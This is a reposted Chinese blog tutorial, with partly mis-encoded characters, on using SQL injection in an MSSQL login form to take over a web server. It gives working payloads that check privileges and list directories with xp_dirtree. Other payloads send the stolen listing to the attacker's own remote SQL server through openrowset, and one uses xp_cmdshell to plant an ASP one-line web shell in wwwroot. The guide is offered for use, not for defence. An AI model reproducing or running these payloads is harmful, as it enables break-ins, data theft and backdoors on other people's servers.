高级SQL注入拿shell,一般黑客不知道。哈客
服務(wù)器只有一個(gè)站,又找不到注入點(diǎn)怎么辦?
? ? 你可以試試在搜索框,登陸,任何框框里放個(gè)單引號(hào),看看是否報(bào)錯(cuò)? ?? ??
? ?? ? 初級(jí)部分
?? ? ? ? ? ? ?
加個(gè)單引號(hào)',后面隨便,隨便填個(gè)密碼,點(diǎn)擊登陸
?? ? ? ? ? ? ?
典型的SQL注入
判斷權(quán)限: ' and user>0--
?? ? ? ? ? ? ? ? ? ? ? ? ?
?? ? ? ? ? ? ?
明顯的sa權(quán)限
獲取數(shù)據(jù)庫(kù)名字: ' and db_name()>0--
?? ? ? ? ? ? ? ? ? ? ? ?
?? ? ? ? ? ? ?
?? ? ? ? ? ? ??? ??
很容易獲取到,數(shù)據(jù)庫(kù)名,如果不是sa權(quán)限 ,比如public權(quán)限,我們可以通過(guò)差異備份獲取shell,但本教程不必了
下面開(kāi)始高級(jí)部分:
就不截圖了,就是把下面代碼放入登錄框執(zhí)行
一:建表,3個(gè)字段
';create table nonamed([name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--
二,把服務(wù)器e盤(pán)目錄和文件名字全部加入到表中(為什么e盤(pán),因?yàn)閑盤(pán)放的是網(wǎng)站目錄,我就不啰嗦了)
';insert nonamed execute master..xp_dirtree 'e:\',1,1--
三,把此表中內(nèi)容插入到遠(yuǎn)程計(jì)算機(jī)的SQL數(shù)據(jù)庫(kù)中,(自己的電腦)
? ?必須有外網(wǎng),
本地的電腦必須有一張和服務(wù)器創(chuàng)建相同的表,表名無(wú)所謂,此例子為e表
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e') select * from nonamed--
回到本地查詢(xún)表e
?? ? ? ? ? ? ? ? ??
?? ? ? ? ? ? ?
上面的第3個(gè)XXX_Site 里面就是放的網(wǎng)站,如何看XXX_Site里的內(nèi)容,繼續(xù)循環(huán)執(zhí)行前面二三步就可以了,
再次執(zhí)行要情空表 delete from nonamed
然后執(zhí)行
';insert nonamed execute master..xp_dirtree 'e:\XXX_Site\',1,1--
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e_site') select * from nonamed--
e_site表是本地的表
發(fā)現(xiàn)wwwroot?
好了,寫(xiě)一句話(huà)木馬吧!
';exec master..xp_cmdshell 'Echo ^<%eval request("a")%>^ >e:\xxx_site\wwwroot\a.asp'
public權(quán)限可以通過(guò)差異備份寫(xiě)馬,上面已經(jīng)提到了
遠(yuǎn)程連接即可
轉(zhuǎn)載于:https://www.cnblogs.com/amwld/archive/2011/08/11/2134975.html
總結(jié)
以上是生活随笔為你收集整理的高级SQL注入拿shell,一般黑客不知道。哈客的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: ACPI知识学习笔记
- 下一篇: 复制一个文件夹中的所有文件和文件夹的ja